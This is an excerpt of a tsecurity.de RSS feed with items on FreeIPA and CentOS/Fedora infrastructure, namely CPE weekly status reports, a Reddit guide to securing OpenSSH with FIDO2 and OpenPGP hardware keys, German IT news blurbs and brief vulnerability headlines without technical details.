<content:encoded><![CDATA[Das Onlinetraining der Golem Akademie ebnet den Weg zum Openshift-Cluster. (<a href="https://www.golem.de/specials/desktop-applikationen/">Applikationen</a>, <a href="https://www.golem.de/specials/cloud-computing/">Cloud Computing</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=154589&amp;page=1&amp;ts=1614687300" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[CentOS Blog: CPE Weekly: 2021-02-14]]></title>
<description><![CDATA[Hi Everyone,
If you would like to see this report and toggle to the section you are
most interested in, I would suggest visiting this link
https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view and use the header bar
on your left to skip to where you want to go!
Initiative FYI Links
Initiatives repo here:...]]></description>
<link>https://tsecurity.de/de/1380628/unix-server/centos-blog-cpe-weekly-2021-02-14/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1380628/unix-server/centos-blog-cpe-weekly-2021-02-14/</guid>
<pubDate>Mon, 15 Feb 2021 17:02:43 +0100</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hi Everyone,</p>
<p>If you would like to see this report and toggle to the section you are<br>
most interested in, I would suggest visiting this link<br>
<a href="https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view">https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view</a> and use the header bar<br>
on your left to skip to where you want to go!</p>
<h2>Initiative FYI Links</h2>
<p>Initiatives repo here: <a href="https://pagure.io/cpe/initiatives-proposal">https://pagure.io/cpe/initiatives-proposal</a><br>
2021 Quarterly Planning timetable here:<br>
<a href="https://docs.fedoraproject.org/en-US/cpe/time_tables/">https://docs.fedoraproject.org/en-US/cpe/time_tables/</a> so you know when<br>
I need it in by to review it.<br>
Details on initiative requesting/how to work with us on new projects<br>
here: <a href="https://docs.fedoraproject.org/en-US/cpe/initiatives/">https://docs.fedoraproject.org/en-US/cpe/initiatives/</a></p>
<h3>Misc</h3>
<h4>Conferences!</h4>
<p>* DevConf.cz is on 18th - 20th Feb! Get your ticket here if you<br>
haven't already <a href="https://hopin.com/events/devconf-cz-2021">https://hopin.com/events/devconf-cz-2021</a><br>
* CentOS Dojo @ FOSDEM was really great last week, and if you missed<br>
it be sure to check out the CentOS youtube channel where all of the<br>
talks are now uploaded and available to view<br>
<a href="https://www.youtube.com/thecentosproject">https://www.youtube.com/thecentosproject</a></p>
<h2>Project Updates</h2>
<p>*The below updates are pulled directly from our CPE team call we have<br>
every week.*</p>
<h2>CentOS Updates</h2>
<h3>CentOS</h3>
<p>* Our CI infra has been updated from Ocp.ci / ocp.stg.ci to 4.6.15<br>
* Monitoring stack updated to zabbix 5.0.8<br>
* Kojihub now supports x86_64,ppc64le &amp; aarch64</p>
<h3>CentOS Stream</h3>
<p>* CentOS Stream container images are now readily available!Check out<br>
the mail from Brian Stinson to the CentOS-devel &amp; announce list here<br>
for more details on tags and where to pull<br>
<a href="https://lists.centos.org/pipermail/centos-devel/2021-February/076503.html">https://lists.centos.org/pipermail/centos-devel/2021-February/076503.html</a></p>
<h3>Fedora</h3>
<p>* Mass branching of packages was completed last week<br>
* Mass branching of modules is underway<br>
* There is already have a branched compose<br>
* The main branch changes are also almost complete with just docs left<br>
* tests namespace in dist-git has migrated to “main” with “master” as<br>
symlink for now with it being removed after F34 release, so mark your<br>
calendar!</p>
<h3>Noggin/AAA</h3>
<p>* Security fixes on Content Security Policy<br>
* Re-installed FreeIPA schema to test a faster way to import user data<br>
as part of tuning &amp; performance testing while still in staging<br>
* If you are experiencing any issues logging in, please reach out to<br>
the team on IRC channel #fedora-aaa<br>
* The work tracker for this project can be found here<br>
<a href="https://github.com/orgs/fedora-infra/projects/6">https://github.com/orgs/fedora-infra/projects/6</a><br>
* And please report any issues you find in the repo<br>
<a href="https://github.com/fedora-infra/noggin">https://github.com/fedora-infra/noggin</a></p>
<h2>Team Info</h2>
<h3>Background:</h3>
<p>The Community Platform Engineering group, or CPE for short, is the Red<br>
Hat team combining IT and release engineering from Fedora and CentOS.<br>
Our goal is to keep core servers and services running and maintained,<br>
build releases, and other strategic tasks that need more dedicated<br>
time than volunteers can give.</p>
<p>See our wiki page here for more<br>
information: <a href="https://docs.fedoraproject.org/en-US/cpe/">https://docs.fedoraproject.org/en-US/cpe/</a></p>
<p>As always, feedback is welcome, and we will continue to look at ways<br>
to improve the delivery and readability of this weekly report.</p>
<p>Have a great week!</p>
<p>Aoife</p>
<p>Source: <a href="https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view">https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Best and Easiest way(s) to Secure OpenSSH authentication on your personal systems.]]></title>
<description><![CDATA[There are two ways that I like nowadays and both of them involve 2FA and hardware keys. Specifically Yubikey in my case, but other ones will probably work as well. The traditional approach to securing OpenSSH authorization involves several approaches:  Traditional SSH Keys - A very good and robus...]]></description>
<link>https://tsecurity.de/de/1379350/linux-tipps/best-and-easiest-ways-to-secure-openssh-authentication-on-your-personal-systems/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1379350/linux-tipps/best-and-easiest-ways-to-secure-openssh-authentication-on-your-personal-systems/</guid>
<pubDate>Sun, 14 Feb 2021 01:00:22 +0100</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>There are two ways that I like nowadays and both of them involve 2FA and hardware keys. Specifically Yubikey in my case, but other ones will probably work as well.</p> <p>The traditional approach to securing OpenSSH authorization involves several approaches:</p> <ul> <li>Traditional SSH Keys - A very good and robust approach for managing access on personal systems. In large organizations the problem of key management is hairier then it seems at first glance.</li> <li>SSH Keys signed with <a href="https://man.openbsd.org/ssh-keygen.1#cert-authority">OpenSSH built-in CA support</a> - A intermediate approach that most people are unaware of that are a good match for many businesses and other organizations. With this approach you are using SSH keys that are signed by a CA. This way you can do things like revoke system access quickly in case of a compromise.</li> <li>Kerberos - A great approach if you are using AD or FreeIPA already. But the overhead of managing it is pretty high and relatively minor issues with network configurations can cause massive headaches, which makes it detrimental for personal use.</li> </ul> <p>So for personal use just old fashioned SSH keys are the way to go. However We can make OpenSSH auth even more secure with hardware tokens.</p> <p>Now the older way to do it is to enable 2FA using OTP (one time password) approach. This generally involves adding additional login requirements in the form of PAM modules. This is going to be the most common search result as it's been in use for years now. It can take advantage of your own TOTP infrastructure or tie into Google's or other providers. This is fine, but I really despise working with PAM. If I can use something OpenSSH supports natively then that is the way to go, IMO. Especially when you can avoid additional infrastructure dependencies.</p> <p>The two "new" ways I have discovered as of late are:</p> <ol> <li>Take advantage of OpenPGP/Smartcard support available on some hardware cards. Most notable Yubikey 5 series, but there are others. With this approach you use GPG and gpg-agent to manage your private keys. Access is protected by a card PIN (can be up to 127 ascii characters).</li> <li>Take advantage of FIDO2. Since version 8.2 OpenSSH has supported FIDO2 authentication natively. Which is freaking fantastic. You should use a password encrypted private key for additional security. Make it more 2FA-ish.</li> </ol> <p>Pros of OpenPGP/Smart card approach:</p> <ul> <li>Can work with older versions of OpenSSH</li> <li>gpg-agent support is built into proper Linux desktops</li> <li>All the private keys are managed via hardware token.</li> <li>Can use hardware token with a wide variety of other software.</li> <li>More single-sign-on-like You don't have to keep fingering your key for things like ansible.</li> </ul> <p>Cons:</p> <ul> <li>A lot of hardware tokens don't have OpenPGP/Smartcard support.</li> <li>Can be a pain to migrate secured (password disable) systems from old key to GPG key. You end up doing things like running one shell with SSH_AUTH_SOCK ssh-agent and another with gpg-agent, or setting up aliases to help copy over new keys and remove old ones.</li> <li>A lot of work is required to setup your card. Need to setup subkeys and such things.</li> <li>You really need to have a second hardware key as backup in case your main key gets lost or damaged.</li> <li>By default gpg deletes private keys from your ~/.gnupg keyring after copying to the card, so you have to back up your keyring prior to that if you want to have backups.</li> <li>Need to configure ssh client to look to gpg-agent instead of ssh-agent.</li> <li>Can't use cool ed25519 keys.</li> </ul> <p>Pros of FIDO2 approach:</p> <ul> <li>Minimal additional configuration. Pretty much all you need to do is use ssh-keygen. It's exceptionally easy to setup.</li> <li>ssh-agent is integrated by default in decent Linux desktops.</li> <li>Uses separate encrypted private key (recommended) for additional password protection.</li> <li>easy migration to new keys.</li> <li>Fido2 works well with many websites.</li> </ul> <p>Cons:</p> <ul> <li>Can't backup your hardware token. You need a second token if you want backup.</li> <li>If you want backup token you have two sets of keys to manage.</li> <li>Need to finger the device for each SSH usage (can mitigate with OpenSSH <a href="https://ldpreload.com/blog/ssh-control">ControlMaster</a> feature. May not be true for all hardware tokens.</li> <li>Needs very new (&gt;8.2) version of OpenSSH to work. So no-go on LTS installs like vanilla CentOS 8.</li> </ul> <p>As you can see the Fido2 approach is the slicker and newer of the two approaches. Probably slightly more secure as well.</p> <p>​</p> <p>With the FIDO2 all you have to do is:</p> <ol> <li>Purchase a hardware token that has U2F/FIDO2 support.</li> <li>Setup the FIDO2 PIN (recommended) (for yubikey use yubiky-manager command "ykman set-pin")</li> <li>And then run ssh-keygen:</li> </ol> <p>​</p> <pre><code>ssh-keygen -C "nice name for key here" -t ed25519-sk -O resident -f ~/.ssh/mynewkey </code></pre> <p>And it should prompt you for your fido2 pin and that's it. You can begin copying around the key with ssh-copy-id.</p> <p>​</p> <p>If you do get a hardware token and it does have OpenPGP support then you really are going to want to use it for other stuff. It can tie into <a href="https://www.passwordstore.org/">Pass password store</a>, secure communication with email and other protocols and a whole bunch of other stuff. If you are already doing that stuff adding OpenSSH support is fairly trivial.</p> <p>The approach to properly setting up OpenPGP support using GNUPG is significantly more involved. The best guide I know of is this one:</p> <p><a href="https://github.com/drduh/YubiKey-Guide">Dr. duh's YubiKey-Guide</a></p> <p>He has you go full-paranoid with offline encrypted creation and backup of the keys among other things. Highly recommended. If you are doing it you might as well do it right.</p> <p>After that you just need to make sure that you have "enable-ssh-support" set in your ~/.gnupg/gpg-agent.conf. (maybe restart your gpg-agent or log out and log back in, whatever works best for you).</p> <p>And then tell OpenSSH to use the gpg-agent socket. Set the equivalent of</p> <pre><code>export SSH_AUTH_SOCK=$(gpgconf --list-dirs agent-ssh-socket) </code></pre> <p>If your .bashrc or whatever is appropriate for your setup.</p> <p>After that you can run:</p> <pre><code>ssh-add -L </code></pre> <p>to list your public key. Which then you can copy around manually. Or just use ssh-copy-id, it'll do the right thing even though there is no pub file in ~/.ssh for it.</p> <p>​</p> <p>After that then pick a standard OpenSSH hardening guide. All the same things apply. Just don't go nuts. No need to make it easy to trivially trigger a denial of service on yourself using silly things like fail2ban. Remember with passwords disabled brute force attacks are worthless. Failed logins are just OpenSSH doing it's job and are about as interesting as logging pings. Successful logins are what you should be monitoring for and be paranoid about!</p> <p>In /etc/ssh/sshd_config do things like:</p> <pre><code>PermitRootLogin no PasswordAuthentication no ChallengeResponseAuthentication no </code></pre> <p>​</p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/natermer"> /u/natermer </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/ljd9rl/best_and_easiest_ways_to_secure_openssh/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/ljd9rl/best_and_easiest_ways_to_secure_openssh/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Onlineprüfung: Luftfahrtbundesamt verteidigt laschen Drohnenführerschein]]></title>
<description><![CDATA[Seit Anfang des Jahres müssen Piloten von Drohnen ein Onlinetraining nachweisen. Obwohl dies leicht manipulierbar ist, hält das LBA es für sinnvoll. (Drohne, Datenschutz)]]></description>
<link>https://tsecurity.de/de/1349192/it-nachrichten/onlinepruefung-luftfahrtbundesamt-verteidigt-laschen-drohnenfuehrerschein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1349192/it-nachrichten/onlinepruefung-luftfahrtbundesamt-verteidigt-laschen-drohnenfuehrerschein/</guid>
<pubDate>Tue, 12 Jan 2021 16:32:33 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Seit Anfang des Jahres müssen Piloten von Drohnen ein Onlinetraining nachweisen. Obwohl dies leicht manipulierbar ist, hält das LBA es für sinnvoll. (<a href="https://www.golem.de/specials/drohne/">Drohne</a>, <a href="https://www.golem.de/specials/datenschutz/">Datenschutz</a>) <img src="https://cpx.golem.de/cpx.php?class=17&amp;aid=153331&amp;page=1&amp;ts=1610468220" alt="" width="1" height="1">]]></content:encoded>
</item>
<item>
<title><![CDATA[Wie Webentwickler Sicherheitslücken erkennen]]></title>
<description><![CDATA[... den zentralen Themen im Web Development. Das Onlinetraining "IT-Sicherheit für Webentwickler" der Golem Akademie widmet sich am 25. und 26.]]></description>
<link>https://tsecurity.de/de/1290573/it-security-nachrichten/wie-webentwickler-sicherheitsluecken-erkennen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1290573/it-security-nachrichten/wie-webentwickler-sicherheitsluecken-erkennen/</guid>
<pubDate>Mon, 09 Nov 2020 11:16:46 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[... den zentralen Themen im Web Development. Das Onlinetraining "<b>IT</b>-<b>Sicherheit</b> für Webentwickler" der Golem Akademie widmet sich am 25. und 26.]]></content:encoded>
</item>
<item>
<title><![CDATA[How to install the FreeIPA identity and authorization solution on CentOS 8]]></title>
<description><![CDATA[Jack Wallen walks you through the process of installing an identity and authorization platform on CentOS 8.]]></description>
<link>https://tsecurity.de/de/1281071/it-security-nachrichten/how-to-install-the-freeipa-identity-and-authorization-solution-on-centos-8/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1281071/it-security-nachrichten/how-to-install-the-freeipa-identity-and-authorization-solution-on-centos-8/</guid>
<pubDate>Thu, 29 Oct 2020 20:46:52 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Jack Wallen walks you through the process of installing an identity and authorization platform on CentOS 8.]]></content:encoded>
</item>
<item>
<title><![CDATA[FreeIPA 4.5.0 Session weak authentication]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in FreeIPA 4.5.0 (Directory Service Software). Affected by this issue is an unknown part of the component Session Handler. There is no information about possible countermeasures known. It may be suggested to replace the affected ob...]]></description>
<link>https://tsecurity.de/de/1222059/sicherheitsluecken/freeipa-450-session-weak-authentication/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1222059/sicherheitsluecken/freeipa-450-session-weak-authentication/</guid>
<pubDate>Fri, 28 Aug 2020 16:48:31 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as critical, has been found in <a href="https://vuldb.com/?product.freeipa">FreeIPA 4.5.0</a> (<a href="https://vuldb.com/?type.directory_service_software">Directory Service Software</a>). Affected by this issue is an unknown part of the component <em>Session Handler</em>. There is no information about possible countermeasures known. It may be suggested to replace the affected object with an alternative product.]]></content:encoded>
</item>
<item>
<title><![CDATA[CentOS Blog: CPE Weekly status email – 2020-05-31]]></title>
<description><![CDATA[CPE Weekly: 2020-05-31
Background:
The Community Platform Engineering group is the Red Hat team combining IT and release engineering from Fedora and CentOS. Our goal is to keep core servers and services running and maintained, build releases, and other strategic tasks that need more dedicated tim...]]></description>
<link>https://tsecurity.de/de/1134646/unix-server/centos-blog-cpe-weekly-status-email-2020-05-31/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1134646/unix-server/centos-blog-cpe-weekly-status-email-2020-05-31/</guid>
<pubDate>Mon, 01 Jun 2020 20:33:26 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>CPE Weekly: 2020-05-31</p>
<p>Background:</p>
<p>The Community Platform Engineering group is the Red Hat team combining IT and release engineering from Fedora and CentOS. Our goal is to keep core servers and services running and maintained, build releases, and other strategic tasks that need more dedicated time than volunteers can give.</p>
<p>See our wiki page here for more information: <a href="https://docs.fedoraproject.org/en-US/cpe/">https://docs.fedoraproject.org/en-US/cpe/</a></p>
<h2>General Project Updates</h2>
<p>Please check out our updated initiative timetable for briefing in new projects to our team here: <a href="https://docs.fedoraproject.org/en-US/cpe/time_tables/">https://docs.fedoraproject.org/en-US/cpe/time_tables/</a><br>
*Note: Initiatives are large pieces of work that require a team of people and weeks/months to complete. Please continue to open tickets in the normal way for bugs, issues, etc.</p>
<p>Don't forget to view our taiga board to see the projects we are currently working on, what we have scoped and whats in our backlog<a href="https://tree.taiga.io/project/amoloney1-cpe-team-projects/kanban?epic=null"> https://tree.taiga.io/project/amoloney1-cpe-team-projects/kanban?epic=null</a></p>
<p>I also currently have weekly IRC office hours on #fedora-meeting-1 @ 1300 - 1400 UTC and I will have a bi-weekly office hours on Centos-meeting @ 1500 - 1600 UTC beginning June 9th also, with Rich Bowen helping me set it up, thanks Rich <img alt="?" class="wp-smiley" src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f642.png"></p>
<p>There is (usually) no agenda for these meetings and is an open floor, so please feel free to stop by and chat casually, or about any projects the CPE team are working on/working on next. The choice of topic is completely yours <img alt="?" class="wp-smiley" src="https://s.w.org/images/core/emoji/12.0.0-1/72x72/1f642.png"></p>
<h3>Gitforge</h3>
<p>Just a quick note to say this project has not made any more notable progress. Our team have some very time-intensive projects currently in flight, so our focus has been and will be on the completion of these projects over the next few months. We are still using the gitlab project tracker <a href="https://gitlab.com/gitlab-org/gitlab/-/issues/217350">https://gitlab.com/gitlab-org/gitlab/-/issues/217350</a> to record issues/technical requirements, and thank you again for your patience during this slower period of the project, it is very much appreciated.</p>
<h2>Fedora Updates</h2>
<p> </p>
<h3>Data Centre Move</h3>
<p>* A reduced services offering of Fedora will be in effect from June 8th until July 28th, est.<br>
* This is to complete the final shipment of hardware from Phoenix to Washington, so please be patient and understanding during this timeframe as some services will be off and the rest, much slower.<br>
* Kevin Fenzi has sent some details on service validation and a call to arms to help us meet the June 15th deadline to have the reduced Fedora operational, please read:<br><a href="https://lists.fedoraproject.org/archives/list/infrastructure@lists.fedoraproject.org/thread/E7HJULW2S76FZCAICURWXX223N5ZXXD7/">https://lists.fedoraproject.org/archives/list/infrastructure@lists.fedoraproject.org/thread/E7HJULW2S76FZCAICURWXX223N5ZXXD7/</a><br>
* Details on what this move may mean for you can be found here<br><a href="https://lists.fedoraproject.org/archives/list/devel-announce@lists.fedoraproject.org/thread/27U6YT73556KYW2RIFJO6J2HYMYVP22U/">https://lists.fedoraproject.org/archives/list/devel-announce@lists.fedoraproject.org/thread/27U6YT73556KYW2RIFJO6J2HYMYVP22U/</a></p>
<h3>AAA Replacement</h3>
<p>* Adding the ability to sign user agreements<br>
* Adding the blog/website attribute for users<br>
* Client library migration to python-freeipa 1.0.0.</p>
<h3>Mbbox</h3>
<p>* Project Dashboard here <a href="https://github.com/fedora-infra/mbbox/projects/1">https://github.com/fedora-infra/mbbox/projects/1</a><br>
* Sprint 3 is done:<br>
* Refactor molecule test suit to share test-cases<br>
* Koji-hub and koji-builder SSL issues solved<br>
* Sprint 4 is in progress<br>
* Kojira CRD<br>
* MBS Backend CRD (MBS doesn’t support fedora messaging)<br>
* Staging environment</p>
<h2>CentOS Updates</h2>
<p> </p>
<h3>CentOS</h3>
<p>* Post OCP4 cluster Installation tasks - storage, TLS cert/ IDP configs, exploring operators that we can use.<br>
* We have a public accessible ocp4 cluster<br>
(<a href="https://console-openshift-console.apps.ocp.ci.centos.org/">https://console-openshift-console.apps.ocp.ci.centos.org/</a>). We are on the verge of figuring out subscriptions.<br>
* Documentation: <a href="https://centosci.github.io/ocp4-docs/">https://centosci.github.io/ocp4-docs/</a><br>
* Linux 8.2 work is still with QA</p>
<h3>CentOS Stream</h3>
<p>* The team are working on adding some 8.2 builds to Stream that failed or did not make it into Stream for whatever reason.</p>
<p>As always, feedback is welcome, and we will continue to look at ways to improve the delivery and readability of this weekly report.</p>
<p>Have a great weekend!</p>
<p>Aoife</p>
<p>Source: <a href="https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view">https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ?view</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CentOS Blog: CPE Weekly: 2020-05-02]]></title>
<description><![CDATA[Background:
The Community Platform Engineering group is the Red Hat team combining IT and release engineering from Fedora and CentOS. Check out our teams info here https://docs.fedoraproject.org/en-US/cpe/
GitForge Updates
* We are tracking our progress here (nothing new added yet, fyi) https://f...]]></description>
<link>https://tsecurity.de/de/1105853/unix-server/centos-blog-cpe-weekly-2020-05-02/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1105853/unix-server/centos-blog-cpe-weekly-2020-05-02/</guid>
<pubDate>Mon, 04 May 2020 17:03:24 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p class="moz-quote-pre">Background:</p>
<p class="moz-quote-pre">The Community Platform Engineering group is the Red Hat team combining IT and release engineering from Fedora and CentOS. Check out our teams info here <a class="moz-txt-link-freetext" href="https://docs.fedoraproject.org/en-US/cpe/">https://docs.fedoraproject.org/en-US/cpe/</a></p>
<h2 class="moz-quote-pre">GitForge Updates</h2>
<p class="moz-quote-pre">* We are tracking our progress here (nothing new added yet, fyi) <a class="moz-txt-link-freetext" href="https://fedoraproject.org/wiki/Git_forge_update">https://fedoraproject.org/wiki/Git_forge_update</a></p>
<p class="moz-quote-pre">* We are still doing a technical deep-dive with our own team on what we need from GitLab and will have a technical plan developed and publically available in the coming weeks - thanks again for your patience, this will take some time to map out.</p>
<p class="moz-quote-pre">* Fedora have also released a blog post <a class="moz-txt-link-freetext" href="https://communityblog.fedoraproject.org/fedora-council-and-the-git-forge/and">https://communityblog.fedoraproject.org/fedora-council-and-the-git-forge/and</a></p>
<p class="moz-quote-pre">* And the council are tracking the community issues in this ticket <a class="moz-txt-link-freetext" href="https://pagure.io/Fedora-Council/tickets/issue/292">https://pagure.io/Fedora-Council/tickets/issue/292</a></p>
<p class="moz-quote-pre">* We are looking at ways to engage closer with the community too so I will have an <b class="moz-txt-star"><span class="moz-txt-tag">*</span>optional<span class="moz-txt-tag">*</span></b> office hours slot on #fedora-meeting @ 1400-1500 UTC every Thursday. Feel free to stop by and say hi! We can talk about Gitforge, or not</p>
<h2 class="moz-quote-pre">Releases!!</h2>
<p class="moz-quote-pre">* F32 released! Congrats to all those who helped make this such an awesome release</p>
<p class="moz-quote-pre">* Lenovo are releasing Fedora as a standard desktop offering!</p>
<p class="moz-quote-pre">* CentOS 7.8.2003 was released for x86_64, aarch64,ppc64, ppc64le and armhfp architectures, including Cloud images (on <a class="moz-txt-link-freetext" href="https://cloud.centos.org/">https://cloud.centos.org</a>)!</p>
<h3 class="moz-quote-pre">Data Centre Move</h3>
<p class="moz-quote-pre">* Communishift is still out, est back online 11th May.</p>
<p class="moz-quote-pre">* Full amended schedule will be published week ending 8th May to hackmd &amp; will be sent to the devel &amp; infra lists.</p>
<p class="moz-quote-pre">* Connectivity is now in place in IAD2 and should be in place in RDU-CC over the weekend.</p>
<p class="moz-quote-pre">* In particular, a HUGE shout out to Stephen Smoogen who has been working all the hours in every day for the last few weeks/months to get this phase of the move operatoinal for the Fedora infrastructure - we would not be able to do this without you Smooge</p>
<p class="moz-quote-pre">* This is literally a two man team of Kevin Fenzi and Stephen Smoogen, who are carrying the weight of this infrastructure on their shoulders and are invaluable to the success of this multi-team and multi-month project, so thank you both.</p>
<p class="moz-quote-pre">* Given the pressures on the Infra folks, a general ask for patience if your ticket / request / ping takes a little bit longer to reply to</p>
<h3 class="moz-quote-pre">AAA Replacement</h3>
<p class="moz-quote-pre">* The team will work with openSUSE to deploy FreeIPA + Noggin to deploy it in their infra before we do!</p>
<p class="moz-quote-pre">* This is really exciting and the team are looking forward to seeing how the solution works in another infrastructure!</p>
<p class="moz-quote-pre">* You can view the teams current, completed and backlog work here <a class="moz-txt-link-freetext" href="https://github.com/orgs/fedora-infra/projects/6">https://github.com/orgs/fedora-infra/projects/6</a></p>
<h3 class="moz-quote-pre">Sustaining Team</h3>
<p class="moz-quote-pre">* The team are using this dashboard to track their work <a class="moz-txt-link-freetext" href="https://github.com/fedora-infra/mbbox/projects/1">https://github.com/fedora-infra/mbbox/projects/1</a></p>
<p class="moz-quote-pre">* Mbbox Upgrade</p>
<p class="moz-quote-pre">* Zuul CI set up is done</p>
<p class="moz-quote-pre">* Koji-hub TLS support added to CR</p>
<p class="moz-quote-pre">* Set up ReadTheDocs documentation - webhook missing for automatic build</p>
<p class="moz-quote-pre">* Identity container for testing</p>
<p class="moz-quote-pre">* Koji-builder CRD PR rebase - SSL authentication with koji-hub</p>
<p class="moz-quote-pre">* Refactor molecule test suite to share tests</p>
<h2 class="moz-quote-pre">CentOS Updates</h2>
<h3 class="moz-quote-pre">CentOS CI</h3>
<p class="moz-quote-pre">* OpenShift upgrade</p>
<p class="moz-quote-pre">* OpenStack to OpenNebula migration scripts</p>
<p class="moz-quote-pre">* Ansible playbooks to manage the creation and bootstrapping of bare metal nodes with RHCOS</p>
<p class="moz-quote-pre">* Packaging work (fixing dependencies)</p>
<p class="moz-quote-pre">* Updated ci-user list on efforts we are putting for CI Infrastructure</p>
<h3 class="moz-quote-pre">CentOS</h3>
<p class="moz-quote-pre">* CentOS 7.8.2003 was released for x86_64, aarch64,ppc64, ppc64le and armhfp architectures. Including Cloud images (on <a class="moz-txt-link-freetext" href="https://cloud.centos.org/">https://cloud.centos.org</a>) - <a class="moz-txt-link-freetext" href="https://blog.centos.org/2020/04/release-centos-linux-7-2003/">https://blog.centos.org/2020/04/release-centos-linux-7-2003/</a></p>
<h3 class="moz-quote-pre">CentOS Stream</h3>
<p class="moz-quote-pre">* Congratulations to Brian Stinson on his excellent session of Ask The Expert, facilitated by Rich Bowen during Red Hat Summit - we hope you caught it, it was really good!</p>
<p class="moz-quote-pre">* Using CentOS Stream in the CentOS QA group to prep for 8.2 As always, feedback is welcome, and we will continue to look at ways to improve the delivery and readability of this weekly report.</p>
<p class="moz-quote-pre">Have a great week ahead!</p>
<p class="moz-quote-pre">Aoife</p>
<p class="moz-quote-pre">Source: <a class="moz-txt-link-freetext" href="https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ">https://hackmd.io/8iV7PilARSG68Tqv8CzKOQ</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CentOS Blog: SIG authentication retooling]]></title>
<description><![CDATA[You may have seen the emails from Aoife about the work the Community Platform Engineering (CPE) team is doing around authentication tooling, and what that might mean for CentOS. Here’s a brief explainer for what’s happening.
The authentication software we use for SIGs (FAS or Fedora Account Syste...]]></description>
<link>https://tsecurity.de/de/1105260/unix-server/centos-blog-sig-authentication-retooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1105260/unix-server/centos-blog-sig-authentication-retooling/</guid>
<pubDate>Mon, 04 May 2020 09:33:52 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>You may have seen the emails from Aoife about the work the <a href="https://docs.fedoraproject.org/en-US/cpe/">Community Platform Engineering (CPE)</a> team is doing around authentication tooling, and what that might mean for CentOS. Here’s a brief explainer for what’s happening.</p>
<p>The authentication software we use for SIGs (FAS or <a href="https://fedoraproject.org/wiki/Account_System">Fedora Account System</a>) and a few other bits around the project will be EOL fairly soon. This is a 10+ year old, difficult to maintain <a href="https://github.com/fedora-infra/fas">software project</a> with bugs that can’t be effectively addressed with its old code. The CPE team is writing a replacement for FAS that uses more of the standard distribution components, largely built around <a href="https://www.freeipa.org/">FreeIPA</a>. This new tooling is intended to be an upgrade for use by anyone, but particularly Fedora and CentOS to replace both uses of FAS currently. There are a number of feature improvements and standardizations included in the new software, but in the end users shouldn’t notice any real impact in operation.</p>
<p>As we engaged with stakeholders including SIG chairs, the CentOS QA team, and other prominent community members, one issue became quickly apparent. We have many SIG contributors who push their work into both CentOS and Fedora, as well as Fedora’s EPEL repository. Having to work with separate auth systems makes it more difficult with automation, testing, and other parts of the contributor workflow. Because of this chance to improve the lives of our current and incoming contributors, our intention with the new authentication rewrite is for the CentOS and Fedora projects to share a single, unified authentication system. This would allow members of our communities who contribute in multiple places to do so via a single account, while having negligible impact on users who don’t. Group management, permissions, etc. will still be the purview of each project to manage as they see fit.</p>
<p>Fixing this gap between the auth systems the CPE team uses also solves some problems for the team itself. Sharing this system also encourages more cross-team work, which benefits both projects and communities (more hands). These communities are already sharing some resources, such as Fedora making use of the CentOS CI system. This work paves the way for easier resource sharing and management, which will cut down on the amount of duplicative work done across both infrastructures.</p>
<p>Over the next few months as the CPE team works toward its October implementation goal, you’ll see additional communication and messaging about the project. That doesn’t mean you need to wait to get involved though. If you’re interested in how we’re designing the auth, or want to participate in the development, please have a look at the <a href="https://github.com/fedora-infra/noggin">git repository</a> and see where you can help!</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Ausführen beliebiger Kommandos in freeipa (Fedora)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/1076820/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-freeipa-fedora/</link>
<guid isPermaLink="true">https://tsecurity.de/de/1076820/it-security-nachrichten/ausfuehren-beliebiger-kommandos-in-freeipa-fedora/</guid>
<pubDate>Mon, 06 Apr 2020 07:45:51 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
